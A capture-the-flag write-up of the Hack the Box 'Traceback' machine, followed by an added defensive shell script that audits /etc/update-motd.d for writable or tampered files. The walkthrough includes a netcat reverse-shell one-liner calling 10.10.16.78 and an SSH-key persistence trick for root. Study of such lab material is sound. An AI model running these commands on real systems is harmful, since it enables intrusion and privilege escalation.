Hack the Box - Traceback Writeup

System Summary


Initial Enumeration

The nmap scan reveals only SSH and HTTP.


The main page is a simple web page:

Looking at the GitHub repos of the box creator (https://github.com/Xh4H/Web-Shells) we can see a webshell collection.
Trying their names against the Traceback machine, we find that one of them is running:


Initial Foothold

Using admin:admin we get access to a panel where we can upload files, list the contents of directories, etc.



Our first objective is to upload a PHP reverse shell (there are many on the internet) and get a shell:




We're in as user webadmin.
The next step is to enumerate other users.

User Flag

There is another user named sysadmin:

There is a note file in the webadmin home:

Lua is a scripting language.
It also seems that user webadmin can run luvit (a Lua interpreter) as user sysadmin via sudo (no password).

The obvious step here is to create a script such as /tmp/nik.lua:


os.execute("rm /tmp/nik;mkfifo /tmp/nik;cat /tmp/nik|/bin/sh -i 2>&1|nc 10.10.16.78 5555 >/tmp/nik")

and run it as:

sudo -u sysadmin /home/sysadmin/luvit /tmp/nik.lua


This gives us a shell as sysadmin.

Root Flag

As sysadmin, the next step is enumeration with tools like LinEnum or similar.
It seems that there is nothing interesting there.
Looking at the running processes with pspy, we can see a recurring task:

There is a process (running as root) that copies files from /var/backups/.update-motd.d/ to /etc/update-motd.d every minute.
Interesting... it looks like something that restores the files if they get modified.

In fact, user sysadmin can modify all the files in /etc/update-motd.d:

The interesting thing is that sshd runs these files as root to show the MOTD and additional messages for every SSH session created.

So we can modify one of the files above to run a command as root and gain access, but we have to be fast, because within one minute the file will be restored.
The sequence of operations is:

  • Add our public SSH key to /home/sysadmin/.ssh/authorized_keys (so we can get access, and also so the key is in place for the next step).

  • Run the command echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header, adding our code to be executed at the next SSH session.

  • Log on as sysadmin via SSH (we should be able to do this as we added the key). This should result in the execution of cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys.

  • Log on as root (the previous command should have added our key to root's authorized keys).
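From the defender's side, an added audit check (not part of the writeup): a POSIX shell script that flags the conditions the escalation above depends on in /etc/update-motd.d, namely a group- or world-writable directory or scripts, scripts not owned by root, and content drift from the reference copy in /var/backups/.update-motd.d. The paths default to the ones named above; the expected owner is a parameter (an assumption of this example) so the check can be run against test directories.

```shell
#!/bin/sh
# Added audit script (not from the writeup). Defaults are the paths the
# writeup names; the expected owner is an argument so the check can be run
# on test directories.
#   usage: check_motd_dir [motd_dir] [backup_dir] [expected_owner]
# Prints one line per finding; exit status 0 = clean, 1 = findings.

# First ten chars of `ls -ld`, e.g. -rwxrwxr-x (char 6 = group w, char 9 = other w)
mode_of() { ls -ld "$1" | cut -c1-10; }
owner_of() { ls -ld "$1" | awk '{print $3}'; }
group_or_world_writable() {
    m=$(mode_of "$1")
    [ "$(printf '%s' "$m" | cut -c6)" = "w" ] || [ "$(printf '%s' "$m" | cut -c9)" = "w" ]
}

check_motd_dir() {
    motd_dir="${1:-/etc/update-motd.d}"
    backup_dir="${2:-/var/backups/.update-motd.d}"
    owner="${3:-root}"
    findings=0
    # A writable directory lets scripts be replaced even if each file is locked down
    if group_or_world_writable "$motd_dir"; then
        printf 'WRITABLE-DIR %s (%s)\n' "$motd_dir" "$(mode_of "$motd_dir")"
        findings=$((findings + 1))
    fi
    for f in "$motd_dir"/*; do
        [ -f "$f" ] || continue
        name=${f##*/}
        if group_or_world_writable "$f"; then
            printf 'WRITABLE %s (%s)\n' "$f" "$(mode_of "$f")"
            findings=$((findings + 1))
        fi
        if [ "$(owner_of "$f")" != "$owner" ]; then
            printf 'OWNER %s owned by %s, expected %s\n' "$f" "$(owner_of "$f")" "$owner"
            findings=$((findings + 1))
        fi
        # Content drift against the reference copy: the periodic root job in the
        # writeup restores this, but only once a minute, so check it directly.
        if [ ! -f "$backup_dir/$name" ]; then
            printf 'NOREF %s has no reference copy in %s\n' "$f" "$backup_dir"
            findings=$((findings + 1))
        elif ! cmp -s "$f" "$backup_dir/$name"; then
            printf 'DRIFT %s differs from %s\n' "$f" "$backup_dir/$name"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}
```

Run it from cron or a monitoring agent; a non-zero exit or any DRIFT/WRITABLE line on the real directories means a login script that root executes has been tampered with or is tamperable.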

